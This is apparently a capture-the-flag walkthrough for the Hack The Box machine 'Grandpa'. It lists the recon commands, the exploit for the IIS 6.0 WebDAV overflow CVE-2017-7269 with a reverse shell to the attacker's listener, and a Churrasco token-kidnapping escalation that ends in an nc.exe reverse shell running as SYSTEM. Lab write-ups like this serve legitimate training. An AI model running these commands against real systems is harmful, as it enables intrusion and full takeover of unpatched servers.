Grandpa - Hack The Box

Reconnaissance

  • Nmap
nmap -sS --open --min-rate 5000 -vvv -n -Pn 10.10.10.14

  • Whatweb
whatweb http://10.10.10.14/

  • Gobuster

Exploitation

  • Buffer Overflow (CVE-2017-7269: IIS 6.0 WebDAV, ScStoragePathFromUrl)
searchsploit IIS 6.0

https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269/blob/master/iis6%20reverse%20shell

Start the listener first, then run the script (saved here as exploit.py). Arguments: target IP, target port, attacker IP, attacker port.
rlwrap nc -nlvp 9000
python2 exploit.py 10.10.10.14 80 10.10.16.7 9000

Post-exploitation

  • Check user privileges (the shell runs as NT AUTHORITY\NETWORK SERVICE; look for SeImpersonatePrivilege, which Churrasco's token kidnapping relies on)
whoami /priv

  • Check OS version (expect Windows Server 2003, the platform Churrasco targets)
systeminfo

  • Copy nc and churrasco (share the current directory as smbFolder; Server 2003 will negotiate SMB1, so -smb2support is optional here)
impacket-smbserver smbFolder $(pwd) -smb2support

https://github.com/int0x33/nc.exe/blob/master/nc.exe

On the target, cd to a directory NETWORK SERVICE can write to first (C:\Windows\Temp works; the IIS directories do not), then copy:
copy \\10.10.16.7\smbFolder\nc.exe

https://github.com/Re4son/Churrasco/blob/master/churrasco.exe

copy \\10.10.16.7\smbFolder\churrasco.exe
  • Run reverse shell as SYSTEM (churrasco.exe runs its argument with a kidnapped SYSTEM token; -d adds debug output; start the listener first)
rlwrap nc -nvlp 4444

echo nc.exe 10.10.16.7 4444 -e cmd.exe > exploit.bat
churrasco.exe -d exploit.bat